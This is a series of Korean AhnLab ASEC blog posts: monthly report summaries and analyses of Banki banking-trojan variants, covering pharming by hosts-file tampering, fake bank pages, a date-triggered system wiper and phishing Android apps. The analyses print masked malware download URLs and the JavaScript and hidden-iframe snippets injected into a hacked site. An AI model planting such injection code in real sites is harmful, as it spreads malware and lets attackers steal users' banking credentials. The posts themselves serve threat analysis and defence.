안랩 ASEC에서 2013년 8월 국내,외에서 발생한 다양한 보안 위협 이슈와 동향들을 정리한 ASEC 리포트 2012 Vol.44을 발간하였다. 


이 번에 발간된 ASEC 리포트는 2013년 8월 주요 보안 위협 이슈들을 다음과 같이 분석하고 있다.


1) 악성코드 이슈

메모리 패치형 Banki의 온라인 뱅킹 정보 탈취 기법 분석

고객님, 영수증이 발급되었습니다

아마존 구매 관련 메일로 위장한 스팸 메일

특정 은행 대출 승인 메일로 위장한 스팸 메일

휴가철, 사용자의 휴가비를 노려라!

동영상 재생 프로그램을 이용한 악성코드 유포

토렌트 파일로 위장한 악성코드 주의

Your reservation is now confirmed!’

델타 항공 메일로 위장한 악성코드 유포


2) 모바일 악성코드 이슈

V3 모바일 설치 위장 스미싱 주의!

금융사 피싱 앱 주의


3) 보안 이슈

자바 취약점과 결합된 메모리 해킹

인터넷 뱅킹 보안 대책


ASEC에서 발간하는 월간 보안 위협 동향 리포트는 아래 웹 사이트에서 확인 할 수 있다. 


ASEC 보안 위협 동향 리포트 2013 Vol.44 발간



저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

 국내 온라인 뱅킹 사용자를 타깃으로 보안카드 등의 금융 정보를 노리는 악성코드(Banki) 변종이 지속적으로 발견되는 가운데, 최근 이름과 주민번호를 체크하는 루틴까지 추가된 변종이 발견되면서 그 수법이 점차 고도화되고 있어 사용자의 주의가 필요로 하다.

 '파밍' 이라고도 부르는 해당 악성코드는 가짜 뱅킹 사이트로 연결되도록 조작해 금융정보를 빼내는 신종 사기 수법으로, 최근 거액의 사기사건이 보고되면서 사회적인 이슈가 되고 있다.

보통 악성 스크립트가 삽입된 취약한 웹사이트를 통해 감염되며, 감염 시 hosts 파일을 변경하여 악성코드 제작자가 만든 가짜 뱅킹 사이트로 접속됨으로써 사용자의 금융정보를 입력 하도록 유도하고 있다.

 

이번에 발견된 변종이 유포되는 유포지 와 [9090.exe] 다운로더 에 의해 생성되는 파일은 아래와 같다.

 

[Download URL]

http://125.***.***.5/9090.exe (Downloder)

http://sk*******3.g****.net/asd.txt (다운로드되는 파일 목록)

http://125.***.***.4:8080/26.exe (hosts 파일 변조)

http://125.***.***.5/8888.exe (021F0552\svchsot.exe 생성)

http://125.***.***.5/23.exe (hosts 파일 변조)

 

다운로드 된 [26.exe], [23.exe] 악성파일에 의해 hosts파일이 아래와 같이 변조된 것을 확인할 수 있는데, 변조된 hosts파일에 의해서 정상적인 뱅킹 사이트에 접속하여도 가짜 사이트로 리다이렉트(redirect)시켜 사용자도 모르게 피싱사이트에 접속되어 피해를 입을 수 있는 것이다.

 

[그림 1] 악성 파일에 의해 변조된 hosts 파일

감염된 PC에서 뱅킹 사이트에 접속한 모습이다.

정상적인 방법으로 뱅킹 사이트를 방문하였지만 피싱 사이트로 리다이렉트 되었으며, 하나같이 보안관련 인증절차를 요구하며, 사용자로 하여금 금융정보를 입력하게끔 유도하고 있다.

 

[그림 2] 가짜 뱅킹 사이트

 

기존의 Banki 악성코드와 마찬가지로, 사용자의 이름, 주민번호, 보안카드 정보 등을 요구하고 있다. 기존에는 임의의 문자와 랜덤 한 숫자로 주민번호를 입력하면 다음 단계로 넘어갔었는데, 이번 변종에서는 사용자의 이름과 주민번호가 정상적으로 입력되었는지 체크하는 루틴이 추가되었다는 것이다.

    

[그림 3] 이름과 주민번호를 체크하는 소스부분

 

또한, 다운로드 된 다른 [8888.exe] 파일은 아래와 같은 경로에 [svchost.exe]을 생성하며 자기 자신을 자동 실행되게끔 tasks(예약작업)에 등록한다.

 

8888.exe CREATE C:\WINDOWS\021F0552\svchsot.exe (Tasks 작업 생성파일)    

svchost.exe CREATE C:\WINDOWS\Tasks\At1.job    

svchost.exe CREATE C:\WINDOWS\Tasks\At2.job    

svchost.exe CREATE C:\WINDOWS\Tasks\At3.job

 

 

[그림 4] 악성코드에 의해 생성된 예약작업들

 

이러한 파밍에 대한 피해를 막기 위해서는, 무리한 개인정보를 요구할 경우 의심을 해야 하며, 무엇보다 보안카드 번호 전체를 요구한다면 100% 파밍이라고 볼 수 있다.

최신 엔진의 백신으로 시스템을 주기적으로 정밀검사 함으로써 금전적인 피해를 예방해야 한다.

 

V3 제품에서는 아래와 같이 진단이 가능하다.

 

<V3 제품군의 진단명>

Trojan/Win32.Banki

 

 

 

신고
Creative Commons License
Creative Commons License
Posted by DH, L@@

안랩 ASEC에서 2012년 12월 국내,외에서 발생한 다양한 보안 위협 이슈와 동향들을 정리한 ASEC 리포트 2012 Vol.36을 발간하였다. 



이 번에 발간된 ASEC 리포트는 2012년 12월 주요 보안 위협 이슈들을 다음과 같이 분석하고 있다.


1) 악성코드 이슈

온라인 뱅킹 트로이목마 Banki(1)

온라인 뱅킹 트로이목마 Banki(2)

패스워드를 노리는 악성코드

악성코드의 3단 콤보 공격

온라인 게임핵 변종 악성코드

특정 후보의 정책관련 한글문서 위장 악성코드

부킹닷컴을 사칭한 악성코드

과다 트래픽을 발생시키는 악성코드

상품권 번호 탈취하는 온라인 게임핵 악성코드

Xerox WorkCentre를 사칭한 악성 메일

Facebook을 사칭한 악성 e-mail 주의


2) 모바일 악성코드 이슈

국내 스마트폰 사용자를 노린 Win-Android/Chest 악성코드

PUP 앱의 폭발적인 증가


3) 보안 이슈

Stuxnet 기술을 이용하는 MySQL 취약점

지속적으로 보고되는 인터넷 익스플로러 use-after-free 취약점


4) 2012년 보안 동향 분석

악성코드 통계

- 2012년 악성코드, 1억3353만1120 건

- 악성코드 대표 진단명 감염보고 최다 20

- 2012년 악성코드 유형 ‘트로이목마’가 최다

모바일 악성코드 이슈

- 월간 모바일 악성코드 접수량

- 모바일 악성코드 유형

- 모바일 악성코드 진단명 감염보고 최다

보안 통계  

- 2012년 4분기 마이크로소프트 보안 업데이트 현황

웹 보안 통계

- 웹 사이트 악성코드 동향

웹 보안 이슈


ASEC에서 발간하는 월간 보안 위협 동향 리포트는 아래 웹 사이트에서 확인 할 수 있다. 


ASEC 보안 위협 동향 리포트 2012 Vol.36 발간


저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

 

 취약점을 이용해서, PC 사용자가 감염사실을 인지 할 수 없도록 동작하는 국내 인터넷 뱅킹 정보 탈취 악성코드가 끊임없이 발견되고 있다. 과거 국내를 대상으로 제작된 정보 탈취 형 악성코드는 주로 주말에 취약점을 통해서 유포/확산 되었지만, 모니터링 결과 주중에도 변형을 제작하여 유포하고 있다.

 

국내 인터넷 뱅킹 정보 탈취 악성코드는 Windows 뿐만 아니라, Android 기반의 스마트폰 앱으로도 유포되었으며, 변종이 계속 발견되고 있다. 더욱이 구글 공식 마켓인 Play Store 에 등록되어 있어 그 영향이 작지 않을 것이다.

 

해킹된 웹사이트에 삽입된 악성 스크립트를 통하여 유포되는, 즉 취약점을 통하여 감염되는 흐름은 이 전에 다루었으므로 생략하겠다. 취약점을 통하여 PC에 다운로드/실행 되는 악성 파일은 아래와 같다.

 

hxxp://121.***.**.229:280/goutou.exe

 

해당 파일이 실행되면 아래와 같은 명령으로 시스템의 Hosts 파일이 변조된다.

이후 PC 사용자는 인터넷 뱅킹을 위해 정상(은행) 사이트를 방문하지만, 실제로는 제작자에 의하여 의도된 피싱(은행) 사이트로 접속하게 되는 것이다.

 

[그림 1] Hosts 파일 변조

 

사용자가 주의 깊게 살펴보지 않으면 정상 사이트와 구분하기 어렵다.

  • [인증절차]를 요구하는 피싱사이트

[그림 2] 정상 사이트(왼쪽) / 피싱 사이트(오른쪽)

 

다른 은행사이트(피싱)도 유사하게 [인증절차]를 요구하고 있다.

 

[그림 3] 은행(피싱)사이트

 

피싱 사이트에서 요구하는 [인증절차] 를 확인해 보면 아래와 같다.

 

[그림 4] 이름 / 주민번호 입력을 요구하는 피싱 사이트

 

위 페이지의 소스를 살펴보면 name_info1, 2, 3 사용자 이름과 주민번호를 인자 값으로 받아서 특정 서버로 전송할 것으로 추정된다.

 

[그림 5] 페이지 소스

이름과 주민번호 정보를 수집한 후에는 보안카드 비밀번호와 같은 추가 정보를 수집하기 위한 페이지로 이동된다.

 

[그림 6] 추가 정보 수집 페이지

 

실제 사용자에 의해 입력된 정보가 특정서버로 전송되는 과정은 아래와 같다.

 

[그림 7] 사용자에 의해 입력된 정보가 전송되는 과정

 

 

이러한 Windows 기반의 악성코드가 Android 기반의 스마트폰에서도 발견되었다.

 

아래 그림8의 페이지는 구글 마켓에 등록된 인터넷 뱅킹 정보 탈취형 악성 앱이다.

[그림 8] 구글 Play Store 에 등록된 악성 앱

 

"NH농협스마트뱅킹", "KB국민스마트뱅킹", "IBK 기업스마트뱅킹", "새마을금고스마트뱅킹", "우리스마트뱅킹"

5개 은행의 이용자를 타겟으로 제작되었으며, 하루 간격으로 변종이 유포되었다. 1월 15일에는 "LEAD TEAM", 16일에는 "ZHANG MENG", "waleriakowalczyk", 17일에는 "Kyle Desjardins" 의 제작자명으로 등록되어 유포되었다.

 

위 악성 앱 중에 하나를 확인해 보겠다.

 

[그림 9] 설치 화면(좌) / 실행 화면(우)

[그림 10] 피싱 사이트 접속 유도 화면

 

[그림 11] 은행(피싱)사이트 접속 화면

[그림 12] 은행(피싱)사이트 접속 화면

 

위 화면에서 볼 수 있듯이 사용자의 개인정보 및 인터넷 뱅킹 정보를 입력하도록 유도하고 있다.

 

해당 부분의 코드를 살펴보면 피싱사이트로 접속을 유도하는 부분을 확인할 수 있다.

[그림 13] 피싱 사이트 접속 유도의 일부 코드

 

[그림 14] 인터넷 뱅킹 정보 탈취 사이트의 일부 코드

 

Windows 기반의 악성코드 감염을 최소화하기 위해선 보안패치를 항상 최신으로 유지하고, 안전성이 확인되지 않은 파일공유사이트(p2p,토렌트)를 이용하지 않는 것이 좋다.

 

▶ Microsoft업데이트

http://update.microsoft.com

 

▶ Flash Player 업데이트

http://get.adobe.com/kr/flashplayer/

 

▶ Java (JRE) 업데이트

http://www.java.com/ko/

 

Android 기반의 금융 관련 앱을 설치할 떄는 해당 금융사가 등록한 것인지, 제작자가 올바른지 확인하고 설치하는 습관이 필요하다.

V3 제품에서는 아래와 같이 진단이 가능하다.

 

<V3 제품군의 진단명>

Trojan/Win32.Banki

Android-Trojan/Yaps

신고
Creative Commons License
Creative Commons License
Posted by DH, L@@

 지난 12월 국내 인터넷 뱅킹 사용자가 타켓인 악성코드(Banki)에서 특정 시스템 날짜가 되면 윈도우 시스템 파일을 삭제하는 기능이 발견되었다.

과거에 발견된 Banki정보는 아래 페이지에서 확인이 가능하다.

 

http://asec.ahnlab.com/search/banki

 

이번에 발견된 Banki 변종은 Induc 바이러스에 감염된 악성코드이며, http://210.***.**.32:2323/qq.exe 를 통하여 유포 되는 것으로 확인되었다.

(온라인 뱅킹 트로이목마 Banki(1) 에서 유포과정을 다루었다.)

 

위 파일이 실행되어 악성코드에 감염될 경우 아래와 같은 경로에 파일이 생성된다.

C:\Windows\system32\muis\tempblogs.\tempblogs..\

'1216', 'Winlogones.exe', 'csrsses.exe'

 

[그림1] 악성코드에 의하여 생성된 파일

 

 

감염 후 아래와 같이 레지스트리에 서비스로 등록되어, 부팅시 실행된다.

 

 

[그림2] 서비스 등록

실행된 환경에 따라 다르게 나타날 수 있지만, 악성 프로세스 'winlogones.exe'는 정상 프로세스인 'winlogon.exe' 에 자신을 인젝션하여 프로세스 목록에 'winlogones.exe' 가 보이지 않게 한다. 동시에 또 다른 악성 프로세스인 'csrsses.exe' 도 계산기 프로세스 이름인 'calc.exe' 에 자신을 인젝션하여 실행한다.

 

[그림3] 정상적인 프로세스만 동작하는 것으로 위장

 

또한, 악성코드는 'winlogones.exe' 가 존재하지 않을 경우, www.mi****.com/temp/q/m.mp3 로 접속하여 다시 다운로드 받게 되어 있다.

이후 프로세스 목록을 확인하여 'V3LSvc.exe', 'AYRTSrv.aye', 'Nsavsvc.npc' 가 없을 경우 아래의 파일을 추가로 다운받는다.

 

다운로드 주소

생성된 파일명

www.zhu*****.com/temp/q/1.mp3

ChilkatCert.dll

www.zhu*****.com/temp/q/q.mp3

qserver.exe

www.zhu*****.com/temp/q/2.mp3

iexplores.exe

www.zhu*****.com/temp/q/3930.mp3

termsrv.dll

www.zhu*****.com:2323/count.txt

count.txt

[표1] 다운로드 파일

 

다운로드 받은 파일은 아래의 경로에 생성된다.

C:\Windows\system32\muis\tempblogs.\tempblogs..\

 

이번 변종에서 발견된 가장 큰 특징은 특정 날짜(2013년 1월 16일)가 되면 시스템 파괴 기능이 동작하도록 제작 되었다.

 

해당 날짜가 되면 아래와 같은 배치 파일을 c:\ 에 생성하며 실행된다.

 

[그림4] 시스템 파괴 기능이 포함된 배치 파일

 

배치 파일에 의하여 ALG(Application Layer Gate) 서비스를 중지하고

hal.dll 파일과 System32 내의 파일을 삭제하게 된다.

 

배치 파일이 실행되면 아래와 같은 메시지가 발생한다.

 

[그림5] 시스템 파괴 기능 동작

 

 

만약, 시스템을 재부팅하게 되면, 아래와 같은 메시지가 나타나며, 정상적인 부팅이 불가능하다.

 

[그림6] 시스템 파괴 후 리부팅시 화면

 

 

 

해당 악성코드는 V3 제품을 통하여 진단 및 치료가 가능했기 때문에, 실제 피해 보고는 접하기 어려웠다.

 

<V3 제품군의 진단명>

Trojan/Win32.Banki

신고
Creative Commons License
Creative Commons License
Posted by DH, L@@

 Boland사에서 개발한 프로그래밍 언어인 Delphi에는 일부 버전(Delphi4 ~ 7)에서 사용하는 Sysconst 라이브러리가 있다. Win32/Induc 바이러스는 이 라이브러리를 감염 시킨 후 컴파일 과정에서 생성되는 EXE, DLL 등에 바이러스 코드를 삽입하는 기법의 바이러스이다.

 

Win32/Induc은 2009년 8월경 발견되었으며 그 당시 국내에서 제작 및 배포되고 있는 Delphi 기반의 프로그램들도 해당 바이러스에 감염된 사례가 다수 있었으나 불행 중 다행인 것은 위에서 언급한 것처럼 Win32/Induc은 Delphi소스에 자신의 코드를 삽입하는 기능만 있을 뿐 감염된 소스가 컴파일 되어 생성된 EXE, DLL을 일반 PC에서 실행시켜도 아무런 피해를 발생시키지 않는다. 만약 Win32/Induc이 Win32/Virut이과 동일한 기능(파일감염, IRC채널 접속, 보안 사이트 접속방해 등)을 가지고 있었다면 다수의 일반 PC들에서 피해가 발생했을 것이다.

 

* Win32/Induc 바이러스 조치 가이드:

http://www.ahnlab.com/kr/site/securitycenter/asec/asecIssueView.do?webAsecIssueVo.seq=57

 

2012년 12월 말 경, Delphi로 제작된 Win32/Induc에 감염된 온라인 뱅킹 트로이목마가 해킹된 국내 웹하드 사이트를 통해서 유포된 사례가 발견되었다.

 

• 웹하드 사이트: http://www.****hard.co.kr/common/JS/action2.js

 

action2.js파일의 내부에는 아래와 같이 자바 스크립트 코드가 삽입되어 있었고 국내 UCC 동영상 관련 사이트로부터 cp.js파일을 다운로드하도록 되어있다.

if(document.cookie.indexOf('ggads')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='ggads=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("<script src=http://ucc.******.co.kr/adsi/cp.js></script>"));}

 

•UCC동영상 사이트:http://ucc.******.co.kr/adsi/cp.js

cp.js파일에 저장된 코드는 아래와 같으며 특정 게임 사이트에서 또 다른 악성 스크립트를 다운로드하도록 되어있다.

document.write("<iframe src=http://flash.*****.pe.kr/adsi/adsi.htmlwidth=0 height=0></iframe>");

 

adsi.html 역시 동일한 사이트에서 index.html파일을 다운로드 하는데 해당 스크립트는 아래 그림처럼 Gongda Pack으로 난독화된 악성 스크립트이다.

 

•UCC동영상 사이트:http://ucc.******.co.kr/adsi/index.html

 

 

[그림 1] Gongda Pack으로 난독화된 index.html

 

위 [그림 1]에서처럼 index.html은 Gongda Pack 툴킷으로 난독화되어 있음을 알 수 있으며 국내 해킹된 사이트를 통해서 유포된 악성 스크립트의 대부분이 해당 툴킷을 통해서 난독화되어 있다. (참고로 index.html이 Gongda Pack으로 난독화되어 있음을 알 수 있는 부분은 바로 아래 부분이다.)

 

/*Encrypt By 210.***.53.***:2323's JSXX 0.44 VIP*/

 

난독화된 index.html파일을 풀어보면 아래처럼 우리가 흔히 사용하는 JAVA와 Internet Explorer에 존재하는 취약점을 이용하여 실행파일을 다운로드함을 알 수 있다.

 

[그림 2] 난독화 해제된 index.html

 

[그림 2]에서 보는 것처럼 qq.exe를 다운로드 및 실행하기 위해서 사용한 취약점은 아래 JAVA 5개, Internet Explorer 1개 등 총 6개를 사용한다.

 

Java : CVE-2010-0886, CVE-2011-3544, CVE-2012-0507, CVE-2012-4681, CVE-2012-5076

IE : CVE-2012-1889

 

위 취약점이 존재할 경우, 다운로드 되는 qq.exe의 내부 코드를 살펴보면 Delphi로 제작되었고 아

래 그림처럼 Win32/Induc 바이러스 코드가 존재함을 확인할 수 있다.

 

00003604 00403604 0 SOFTWARE\Borland\Delphi\RTL

00005568 00405568 0 Software\Borland\Locales

00005584 00405584 0 Software\Borland\Delphi\Locales

 

[그림 3] Win32/Induc 바이러스 코드가 포함된 qq.exe

 

qq.exe에 의해서 다운로드되는 2.mp3파일도 마찬가지로 아래 그림처럼 Win32/Induc 바이러스가 존재했다.

[그림 4] qq.exe에 의해서 다운로드되는 2.mp3

 

V3 제품에서는 아래와 같이 진단이 가능하다.

 

Win-Trojan/Prosti.132540

Trojan/Win32.Banki

신고
Creative Commons License
Creative Commons License
Posted by DH, L@@

안랩 ASEC에서 2012년 10월 국내,외에서 발생한 다양한 보안 위협 이슈와 동향들을 정리한 ASEC 리포트 2012 Vol.34을 발간하였다. 



이 번에 발간된 ASEC 리포트는 2012년 10월 주요 보안 위협 이슈들을 다음과 같이 분석하고 있다.


1) 악성코드 이슈

10월에 발견된 취약한 한글 문서 파일

MS 워드, PDF 문서들의 취약점을 악용하는 악성코드 다수 발견

한글 소프트웨어의 제로데이 취약점 악용 악성코드

미국 대선 뉴스로 위장한 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷

플레임 악성코드 변형 miniFlame 변형 발견

윈도우 도움말 파일을 이용한 악성코드 유포

국방 관련 내용을 담은 취약한 한글 파일

연봉 계약서로 위장한 취약한 한글 파일 발견

한반도 정황 관련 내용의 취약한 한글 파일 발견

대만 기상청을 대상으로 한 타깃 공격 발견

이스라엘 정부 기관 대상의 타깃 공격 발생

국내 PC 사용자를 대상으로 유포된 아두스카 부트킷

usp10.dll 파일을 이용한 온라인 게임 악성코드


2) 모바일 악성코드 이슈

NH모바일 웹 피싱사이트

방통위 사칭 악성 애플리케이션


3) 악성코드 분석 특집

패치드(Patched) 형태의 악성코드 변천사

ZeroAccess로도 알려진 Smiscer 변형

IFEO 를 이용하는 악성코드

Bootkit Story Part 1. 모체를 찾아라!


4) 보안 이슈

Adobe사의 유출된 code signing 악용사례 발생

미국 금융 기업 DDoS 공격

개인 금융 정보 탈취를 노리는 Banki 트로이목마 변형


ASEC에서 발간하는 월간 보안 위협 동향 리포트는 아래 웹 사이트에서 확인 할 수 있다. 


ASEC 보안 위협 동향 리포트 2012 Vol.34 발간


저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

안랩 ASEC에서 2012년 7월 국내,외에서 발생한 다양한 보안 위협 이슈와 동향들을 정리한 ASEC 리포트 2012 Vol.31을 발간하였다. 



이 번에 발간된 ASEC 리포트는 2012년 7월 주요 보안 위협 이슈들을 다음과 같이 분석하고 있다.


1) 악성코드 이슈

Banki 트로이목마의 공습

구글 코드를 악용한 악성코드 유포

국외 은행 피싱 메일

아래아한글 취약점을 악용한 파일 추가 발견

링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷

BHO에 등록되는 온라인 게임핵 악성코드

WinSocketA.dll 파일을 이용하는 온라인 게임핵

Cross-Platform 악성코드

위구르족을 타깃으로 한 맥 악성코드


2) 모바일 악성코드 이슈

APT 공격과 관련된 안드로이드 악성코드 발견

스마트폰에도 설치되는 애드웨어


3) 보안 이슈

DNS changer 감염으로 인한 인터넷 접속 장애 주의

BIND 9 취약점 발견 및 업데이트 권고

어느 기업의 데이터 유출 후, 고객에게 보내진 ‘보안 패치’ 메일의 비밀


4) 웹 보안 이슈

GongDa Pack의 스크립트 악성코드 증가

해킹된 동영상 사이트를 통한 악성코드 유포

XML 코어 서비스 취약점 악용으로 온라인 게임 악성코드 유포


ASEC에서 발간하는 월간 보안 위협 동향 리포트는 아래 웹 사이트에서 확인 할 수 있다. 


ASEC 보안 위협 동향 리포트 2012 Vol.31 발간


저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

검색 엔진을 개발하는 구글(Google)에서는 사용자들의 편의성을 위해 지메일(Gmail), 구글 리더(Google Reader)와 구글 닥스(Google Docs) 등 여러가지 서비스를 제공해주고 있다.


구글에서 제공하는 서비스들은 인터넷만 연결되어 있다면 언제든지 메일과 웹 사이트 그리고 문서 등을 읽거나 작업할 수 있는 공간을 제공 해주고 있으며, 개발자들의 경우에는 구글 코드(Google Code)라고 하여 프로그램 개발과 관련한 소스코드와 파일등을 개발자들 사이에서 공유 할 수 있는 공간을 제공하고 있다.


이러한 서비스들 모두 24시간 중단되지 않는 가용성을 제공하고 있으며, 구글에서 운영을 하고 있음으로 안정성까지 제공 받을 수 있다는 점을 악용하여 구글 코드에 악성코드를 업로드하여 유포에 악용하는 사례가 7월 23일 발견되었다.


구글 코드를 악성코드 유포에 악용하였던 사례는 이번이 처음은 아니며 7월 18일 발견되었던 개인 금융 정보 탈취 목적의 Banki 트로이목마 역시 구글 코드를 악용하였다.


이 번에 발견된 구글 코드를 악용해 유포되고 있는 악성코드들은 아래 이미지와 같이 총 2개의 파일이며 server.exe (58,368 바이트)와 1.exe (37,772 바이트)이다.



해당 악성코드들의 상관 관계에 대해 ASD(AhnLab Smart Defense)의 데이터베이스를 통해 분석 결과 1.exe (37,772 바이트)는 최초 7월 22일 17시경 유포되었다.


해당 1.exe (37,772 바이트) 파일이 실행되면 윈도우 시스템 폴더에 다음과 같이 자신의 복사본으로 생성하게 된다.


C:\WINDOWS\system32\WinHelp32.exe


그리고 "Windows Help Systemg" 라는 서비스명으로 다음의 레지스트리 키를 생성하여 시스템 재부팅시 자동 실행하도록 구성하였다.


HKLM\SYSTEM\ControlSet001\Services\WinHelp32t\ImagePath

"C:\WINDOWS\system32\WinHelp32.exe"


그리고 중국에 위치한 특정 시스템으로 접속을 시도하게 되나 분석 당시에는 정상적인 접속이 이루어지지 않았다. 그러나 ASD의 데이터베이스를 통해 네트워크 접속 로그를 확인한 결과 7월 22일 23시경에는 다음 파일을 다운로드 하는 명령을 수행하고 있었다.


http://*********.googlecode.com/files/server.exe


1.exe (37,772 바이트)는 별도의 드라이버 파일(.SYS) 파일을 통해 보안 소프트웨어에 의해 후킹(Hooking)되어 있는 SSDT(System Service Dispatch Table)를 강제로 복구하는 기능을 수행하여, 자신이 보안 제품에 의해 탐지 되지 않도록 한다.


그 외에 공격자 의도에 따라 다음의 악의적인 기능들을 수행하게 된다.


파일 다운로드 및 실행

운영 체제 및 하드웨어 정보 수집

DoS(Denial of Service) 공격


1.exe (37,772 바이트)에 의해 다운로드 되는 server.exe (58,368 바이트)가 실행면 윈도우 시스템 폴더에 다음 파일을 생성하게 된다.


C:\WINDOWS\system32\(6자리 임의의 문자).exe   


그리고 "Remote Command Service"라는 서비스명으로 레지스트리 키를 생성하여 시스템 재부팅시 자동 실행하도록 구성하였다.


HKLM\SYSTEM\ControlSet001\Services\rcmdsvc\ImagePath

"C:\WINDOWS\system32\(6자리 임의의 문자).exe"


이와 함께 레지스트리 특정 키값을 수정하여 윈도우 시스템에 내장된 방화벽을 우회 할 수 있도록 설정하게 된다.


server.exe (58,368 바이트) 역시 7월 23일 20시 경에는 중국에 위치한 시스템에 접속을 시도하였으나 분석 당시에는 정상적인 접속이 이루어지지 않았다.


해당 파일 역시 공격자 의도에 따라 다음과 같이 일반적인 백도어(Backdoor)와 유사한 다양한 악의적인 기능들을 수행하게 된다.


파일 다운로드 및 실행

운영 체제 및 하드웨어 정보 수집

키보드 입력 후킹

DoS(Denial of Service) 공격

원격 제어


이 번 구글 코드를 통해 유포된 해당 악성코드들은 V3 제품군에서 다음과 같이 진단한다.


Win-Trojan/Agent.70144.KG

Backdoor/Win32.Yoddos


ASD 데이터베이스의 데이터를 통해 1.exe (37,772 바이트)와 server.exe (58,368 바이트)의 정보들을 분석하는 과정에서 1.exe (37,772 바이트)가 다수의 국내 웹 사이트들에 대한 분산 서비스 거부(Distributed Denial-of-Service) 공격을 수행하였던 데이터들을 확인하였다.


해당 분산 서비스 거부 공격의 대상이 되었던 웹 사이트들은 웹 하드 서비스 업체 웹 사이트와 소규모 의류 쇼핑몰이 주를 이루고 있었다.


이러한 정황들을 미루어 공격자는 중국 언더그라운드에서 공유되는 악성코드 생성기를 통해 생성한 악성코드들을 구글 코드에 업로드 한 후 취약한 웹 사이트 또는 포털 웹 사이트의 카페 등을 통해 유포한 것으로 추정된다.

저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원

온라인 뱅킹에 사용되는 개인 금융 정보를 탈취하는 Banki 트로이목마 변형들이 지속적으로 유포되고 있는 것이 금일 새벽 다시 발견되었다.


ASEC에서는 Banki 트로이목마 변형이 유포 중인 사실을 7월 11일과 16일 공개하였으며, 그 유포 방식에 있어서도 7월 11일 취약한 웹 사이트를 통해 웹 브라우저와 자바(JAVA) 취약점을 악용한 형태로 유포되었으며, 7월 16일 공개시에는 14일과 15일 주말 사이 사용자가 많은 웹 하드 프로그램의 웹 사이트를 통해 유포되었다.


금일 새벽 다시 발견된 Banki 트로이목마 변형은 아래 이미지와 같이 구글(Google)에서 운영하는 구글 코드 웹 페이지를 통해 유포되었다.



ASEC은 구글 시큐리티(Google Security) 팀과 협력으로 현재 Banki 트로이목마 변형이 업로드 되어 있는 해당 구글 코드의 특정 웹 페이지 자체를 삭제한 상태이다.


이번 구글 코드의 특정 웹 페이지를 통해 유포된 Banki 트로이목마 변형은 기존에 발견된 변형들과 유사한 형태로 제작 및 구성 되어 있으며, 아래 이미지와 같은 형태로 동작하게 되어 있다.



금일 새벽 발견된 Banki 트로이 목마 변형은 기존 변형들과 동일하게 RARSfx로 압축되어 있으며, aax.exe (167,310 바이트)이 실행되면 윈도우 시스템 폴더에 다음 파일들을 생성하게 된다.


C:\WINDOWS\system32\WindowsDirectx.exe (180,224 바이트)

C:\WINDOWS\system32\ServiceInstall.exe (61,440 바이트)


그리고 생성된 WindowsDirectx.exe (180,224 바이트)은 일본에 위치한 특정 시스템으로 접속을 시도하게 되며 접속이 성공하게 될 경우에는 RARSfx로 압축된 74.exe (413,304 바이트)를 다운로드 후 실행하게 된다.


다운로드 된 74.exe (413,304 바이트)가 실행되면 윈도우 폴더에 다음 파일들을 생성하게 된다.


C:\WINDOWS\HDSetup.exe (442,368 바이트) 

C:\WINDOWS\CretClient.exe (720,896 바이트)


그리고 CONFIG.INI (29 바이트)에는 홍콩에 위치한 특정 시스템의 IP가 기록되어 있으며, 생성된 HDSetup.exe (442,368 바이트) 는 이를 참조하여 감염된 PC에 존재하는 hosts 파일을 다음과 같이 변경하게 된다.



그러나 금일 새벽에 발견된 변형은 특이하게 안랩의 도메인을 포함하여 탐지 및 발견을 우회하고자 한 점이 특이 사항이라고 볼 수 잇다.


금일 발견된 Banki 트로이 목마 변형들과 관련 악성코드들은 모두 V3 제품군에서 다음과 같이 진단한다.


Dropper/Win32.Banki

Trojan/Win32.Banki

Trojan/Win32.Scar


해당 Banki 트로이목마 변형이 유포 중인 구글 코드 웹 페이지의 다운로드 수가 300건이 넘는 것으로 미루어 해당 악성코드 제작자는 다른 취약한 웹 페이지와 연동하여 다운로드 가능 하도록 설정한 것으로 추정된다.


그러므로 사용하는 운영체제와 일반 어플리케이션들의 취약점을 제거할 수 잇는 보안 패치 설치와 함께 사용하는 보안 제품을 최신 버전으로 유지하는 것이 중요하다.

저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원